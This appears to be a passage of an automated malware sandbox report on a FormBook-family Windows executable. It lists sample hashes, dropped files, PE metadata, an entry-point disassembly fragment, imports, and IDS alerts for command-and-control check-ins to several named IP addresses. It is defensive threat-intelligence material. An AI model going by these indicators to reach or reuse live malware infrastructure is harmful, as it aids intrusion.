                                                            MULTIBAND-NEWHOPEUSSLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.40
                                                            ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 209.74.77.109
                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            No context
                                                            No context
                                                            Process:C:\Windows\SysWOW64\RMActivate_ssp_isv.exe
                                                            File Type:Unknown
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1239949490932863
                                                            Encrypted:false
                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                            MD5:271D5F995996735B01672CF227C81C17
                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\BLv4mI7zzY.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287744
                                                            Entropy (8bit):7.991802773963083
                                                            Encrypted:true
                                                            SSDEEP:6144:hfm/nLick/szHmRlboIY1HLBwPaA0hm1c4s1Tk97wN:Rmji5uEYHePajoeP1Q97wN
                                                            MD5:78866E970E924ABEDC1090F69D20FDEE
                                                            SHA1:D1350719810692695704CD3C1BE2033172F14347
                                                            SHA-256:2E3D4AABA98D3078FB2A561BC2697ECACC6504CAB272D0927BD81E55413A894F
                                                            SHA-512:DC8260F160FC9654DA99DF0BFE08BE3168C35BC15D580A6D62E19FA51984D79CAE42221C6E55F81898D1E20010BD415AAC3FDB9AEB9558AF4C152FAEAFEE3AFC
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...U[6DKF2QJ..BG.9UX6DKBrQJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJB.J9UV).EB.X.y.C....0_7k2@>-*+/g)X;6Y0k Wq8-$b.$...ed&-V4dUGHcJ9UX6DK;3X.e*%.wY2..$,.(..p" .#...x+%.K..~'-..1U,v"U.JXJBGJ9U.sDK.3PJ...'J9UX6DKB.QHYACLJ9.\6DKB2QJXJ.SJ9UH6DK26QJX.BGZ9UX4DKD2QJXJBGL9UX6DKB2!NXJ@GJ9UX6FK..QJHJBWJ9UX&DKR2QJXJBWJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJv>'?>9UXR.OB2AJXJ.CJ9EX6DKB2QJXJBGJ9uX6$KB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2
                                                            Process:C:\Users\user\Desktop\BLv4mI7zzY.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287744
                                                            Entropy (8bit):7.991802773963083
                                                            Encrypted:true
                                                            SSDEEP:6144:hfm/nLick/szHmRlboIY1HLBwPaA0hm1c4s1Tk97wN:Rmji5uEYHePajoeP1Q97wN
                                                            MD5:78866E970E924ABEDC1090F69D20FDEE
                                                            SHA1:D1350719810692695704CD3C1BE2033172F14347
                                                            SHA-256:2E3D4AABA98D3078FB2A561BC2697ECACC6504CAB272D0927BD81E55413A894F
                                                            SHA-512:DC8260F160FC9654DA99DF0BFE08BE3168C35BC15D580A6D62E19FA51984D79CAE42221C6E55F81898D1E20010BD415AAC3FDB9AEB9558AF4C152FAEAFEE3AFC
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...U[6DKF2QJ..BG.9UX6DKBrQJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJB.J9UV).EB.X.y.C....0_7k2@>-*+/g)X;6Y0k Wq8-$b.$...ed&-V4dUGHcJ9UX6DK;3X.e*%.wY2..$,.(..p" .#...x+%.K..~'-..1U,v"U.JXJBGJ9U.sDK.3PJ...'J9UX6DKB.QHYACLJ9.\6DKB2QJXJ.SJ9UH6DK26QJX.BGZ9UX4DKD2QJXJBGL9UX6DKB2!NXJ@GJ9UX6FK..QJHJBWJ9UX&DKR2QJXJBWJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJv>'?>9UXR.OB2AJXJ.CJ9EX6DKB2QJXJBGJ9uX6$KB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.179308716914194
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:BLv4mI7zzY.exe
                                                            File size:1'198'080 bytes
                                                            MD5:b6a92ee2ba34b81fa9484072b4d20072
                                                            SHA1:0726cc609fcd36cdf9634faacce3d77d16c9129b
                                                            SHA256:54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5
                                                            SHA512:546c2f57a12aed5108d20c0a471d6f1ab9146b5a349dd00f3ee70c4cc0d46838861057732d44774cd4d6dfd3ab92bc81aa69c6660856a8fcdd1e0106295c8b41
                                                            SSDEEP:24576:Wu6J33O0c+JY5UZ+XC0kGso6FavsTpoIVqHccj+0WY:4u0c++OCvkGs9FavsTpPkXjMY
                                                            TLSH:6345CF2273DDC360CB669173BF69B7016EBF3C614630B95B2F880D7DA950162162DBA3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x427dcd
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6769F347 [Mon Dec 23 23:33:27 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                            Instruction
                                                            call 00007F9ED552EFCAh
                                                            jmp 00007F9ED5521D94h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F9ED5521F1Ah
                                                            cmp edi, eax
                                                            jc 00007F9ED552227Eh
                                                            bt dword ptr [004C31FCh], 01h
                                                            jnc 00007F9ED5521F19h
                                                            rep movsb
                                                            jmp 00007F9ED552222Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007F9ED55220E4h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007F9ED5521F20h
                                                            bt dword ptr [004BE324h], 01h
                                                            jc 00007F9ED55223F0h
                                                            bt dword ptr [004C31FCh], 00000000h
                                                            jnc 00007F9ED55220BDh
                                                            test edi, 00000003h
                                                            jne 00007F9ED55220CEh
                                                            test esi, 00000003h
                                                            jne 00007F9ED55220ADh
                                                            bt edi, 02h
                                                            jnc 00007F9ED5521F1Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007F9ED5521F23h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007F9ED5521F75h
                                                            bt esi, 03h
                                                            jnc 00007F9ED5521FC8h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD4 build 31101
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD4 build 31101
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5bf18.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1230000x711c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc70000x5bf180x5c0000afaeae48652cdd9bcf5461505bdaafbFalse0.9284376061480978data7.895878686080413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1230000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcf7b80x531dfdata1.0003260419389801
                                                            RT_GROUP_ICON0x1229980x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x122a100x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x122a240x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x122a380x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x122a4c0xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x122b280x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                            DLLImport
                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-11T05:39:48.471913+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.653765162.218.30.23580TCP
                                                            2025-01-11T05:39:48.471913+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.653765162.218.30.23580TCP
                                                            2025-01-11T05:40:13.477922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65376713.228.81.3980TCP
                                                            2025-01-11T05:40:16.043618+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65376813.228.81.3980TCP
                                                            2025-01-11T05:40:18.584119+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65376913.228.81.3980TCP
                                                            2025-01-11T05:40:21.142542+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65377013.228.81.3980TCP
                                                            2025-01-11T05:40:21.142542+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65377013.228.81.3980TCP
                                                            2025-01-11T05:40:35.162238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.653771209.74.79.4080TCP
                                                            2025-01-11T05:40:37.704071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.653772209.74.79.4080TCP
                                                            2025-01-11T05:40:40.244395+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.653774209.74.79.4080TCP
                                                            2025-01-11T05:40:42.945271+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.653775209.74.79.4080TCP
                                                            2025-01-11T05:40:42.945271+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.653775209.74.79.4080TCP
                                                            2025-01-11T05:40:50.123152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65377647.254.140.25580TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 05:39:04.469139099 CET5357453192.168.2.61.1.1.1
